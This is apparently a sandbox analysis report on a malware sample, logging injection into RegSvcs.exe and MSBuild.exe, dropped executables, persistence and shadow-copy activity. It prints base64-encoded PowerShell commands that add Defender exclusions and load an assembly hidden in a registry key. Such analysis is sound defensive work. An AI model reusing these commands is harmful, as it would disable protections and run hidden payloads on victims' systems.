Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe
3852	explorer.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3852	explorer.exe
1184	StartMenuExperienceHost.exe
4144	SearchHost.exe
3852	explorer.exe
5660	SearchHost.exe
2112	SearchHost.exe
3456	SearchHost.exe
5760	SearchHost.exe
3328	SearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1120 wrote to memory of 3396	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	92
PID 1120 wrote to memory of 3396	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	92
PID 1120 wrote to memory of 3396	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	92
PID 1120 wrote to memory of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 1120 wrote to memory of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 1120 wrote to memory of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 1120 wrote to memory of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 1120 wrote to memory of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 1120 wrote to memory of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 4132 wrote to memory of 652	4132	Source.exe	126
PID 4132 wrote to memory of 652	4132	Source.exe	126
PID 4132 wrote to memory of 652	4132	Source.exe	126
PID 4132 wrote to memory of 652	4132	Source.exe	126
PID 4132 wrote to memory of 652	4132	Source.exe	126
PID 4132 wrote to memory of 652	4132	Source.exe	126
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 652 wrote to memory of 1372	652	Source.exe	127
PID 1372 wrote to memory of 5196	1372	RegSvcs.exe	128
PID 1372 wrote to memory of 5196	1372	RegSvcs.exe	128
PID 1372 wrote to memory of 5196	1372	RegSvcs.exe	128
PID 1372 wrote to memory of 5196	1372	RegSvcs.exe	128
PID 1372 wrote to memory of 5196	1372	RegSvcs.exe	128
PID 1372 wrote to memory of 5196	1372	RegSvcs.exe	128
PID 3396 wrote to memory of 1440	3396	Hyhueiwl.exe	133
PID 3396 wrote to memory of 1440	3396	Hyhueiwl.exe	133
PID 3396 wrote to memory of 5696	3396	Hyhueiwl.exe	134
PID 3396 wrote to memory of 5696	3396	Hyhueiwl.exe	134
PID 3396 wrote to memory of 5696	3396	Hyhueiwl.exe	134
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 3396 wrote to memory of 5772	3396	Hyhueiwl.exe	135
PID 1440 wrote to memory of 5640	1440	Yabai.exe	136
PID 1440 wrote to memory of 5640	1440	Yabai.exe	136
PID 1440 wrote to memory of 5640	1440	Yabai.exe	136
PID 1440 wrote to memory of 5640	1440	Yabai.exe	136
PID 1440 wrote to memory of 5640	1440	Yabai.exe	136
PID 1440 wrote to memory of 5640	1440	Yabai.exe	136
PID 4268 wrote to memory of 1368	4268	Source.exe	143
PID 4268 wrote to memory of 1368	4268	Source.exe	143
PID 4268 wrote to memory of 1368	4268	Source.exe	143
PID 4268 wrote to memory of 1368	4268	Source.exe	143
PID 4268 wrote to memory of 1368	4268	Source.exe	143
PID 4268 wrote to memory of 1368	4268	Source.exe	143
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 1368 wrote to memory of 3304	1368	Source.exe	146
PID 3304 wrote to memory of 5764	3304	MSBuild.exe	151
PID 3304 wrote to memory of 5764	3304	MSBuild.exe	151
PID 3304 wrote to memory of 5764	3304	MSBuild.exe	151
PID 3304 wrote to memory of 5764	3304	MSBuild.exe	151

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe
"C:\Users\Admin\AppData\Local\Temp\fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe
  "C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3396
- - C:\Users\Admin\AppData\Local\Temp\Yabai.exe
    "C:\Users\Admin\AppData\Local\Temp\Yabai.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Yabai.exe
      C:\Users\Admin\AppData\Local\Temp\Yabai.exe
      4⤵
      Executes dropped EXE
      PID:5640
- - C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe
    C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe
    3⤵
    - Executes dropped EXE
    PID:5696
- - C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe
    C:\Users\Admin\AppData\Local\Temp\Hyhueiwl.exe
    3⤵
    - Executes dropped EXE
    PID:5772
- C:\Users\Admin\AppData\Local\Temp\fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe
  C:\Users\Admin\AppData\Local\Temp\fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4312

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\9ffae5b90494475da251b74d32633f11 /t 3180 /p 3176
1⤵
PID:1244

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:2
1⤵
PID:3540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:2604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3192 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:3140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:4732

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4544 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5092 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:3616

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1184

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:4712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --mojo-platform-channel-handle=5220 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:4684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --mojo-platform-channel-handle=5044 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5436

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5660

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2112

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3456

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5760

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4132
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5196

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=4628 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:3140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5416 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:2
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --mojo-platform-channel-handle=4948 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:1
1⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2768 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:5736

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004A8
1⤵
PID:2220

C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4268
- C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3304
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      PID:5764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
PID:5776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 --field-trial-handle=1928,i,13841519451965558552,16309629369897810051,131072 /prefetch:8
1⤵
- Modifies registry class
PID:728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3176
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5696
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5980
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5728
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5492
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2372
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5976
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5360

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1440
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:5616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3036
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3004
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5840
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2496
